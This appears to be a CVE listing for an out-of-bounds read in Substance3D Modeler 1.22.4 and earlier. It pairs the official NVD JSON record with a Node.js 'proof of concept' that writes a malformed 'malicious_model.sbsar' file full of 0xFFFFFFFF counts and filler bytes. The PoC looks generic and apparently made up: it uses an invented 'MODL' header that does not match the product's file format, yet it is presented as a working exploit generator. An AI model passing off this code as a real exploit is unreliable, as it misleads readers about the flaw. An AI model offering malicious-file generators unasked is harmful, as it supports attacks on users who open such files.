CVE-2026-21302

// CVE-2026-21302 PoC - Malicious 3D Model File Generator // This PoC demonstrates the structure needed to trigger the out-of-bounds read // Use with caution and only for authorized security testing const fs = require('fs'); function createMaliciousModelFile() { // Craft a malformed 3D model file header const header = Buffer.alloc(64); header.writeUInt32LE(0x4D4F444C, 0); // Magic number 'MODL' header.writeUInt32LE(1, 4); // Version header.writeUInt32LE(0xFFFFFFFF, 8); // Malformed vertex count header.writeUInt32LE(0xFFFFFFFF, 12); // Malformed index count // Craft vertex data with oversized values const vertexData = Buffer.alloc(1024); for (let i = 0; i < 256; i++) { vertexData.writeFloatLE(999999.0, i * 4); // Out of range coordinates } // Craft malformed texture coordinates const texCoordData = Buffer.alloc(512); texCoordData.fill(0xFF); // Combine all sections const maliciousFile = Buffer.concat([header, vertexData, texCoordData]); // Save as a 3D model file fs.writeFileSync('malicious_model.sbsar', maliciousFile); console.log('Malicious model file created: malicious_model.sbsar'); console.log('File size:', maliciousFile.length, 'bytes'); } createMaliciousModelFile();

{"cve": {"id": "CVE-2026-21302", "sourceIdentifier": "[email protected]", "published": "2026-01-13T21:15:53.960", "lastModified": "2026-01-14T17:58:14.300", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Substance3D - Modeler versions 1.22.4 and earlier are affected by an Out-of-bounds Read vulnerability that could lead to memory exposure. An attacker could leverage this vulnerability to disclose sensitive information stored in memory. Exploitation of this issue requires user interaction in that a victim must open a malicious file."}, {"lang": "es", "value": "Substance3D - Modeler versiones 1.22.4 y anteriores se ven afectadas por una vulnerabilidad de lectura fuera de límites (Out-of-bounds Read) que podría conducir a la exposición de memoria. Un atacante podría aprovechar esta vulnerabilidad para divulgar información sensible almacenada en memoria. La explotación de este problema requiere interacción del usuario en el sentido de que una víctima debe abrir un archivo malicioso."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-125"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:adobe:substance_3d_modeler:*:*:*:*:*:*:*:*", "versionEndExcluding": "1.22.5", "matchCriteriaId": "D5A6870D-D2DE-4B8F-8680-3717CA179D14"}]}]}], "references": [{"url": "https://helpx.adobe.com/security/products/substance3d-modeler/apsb26-08.html", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}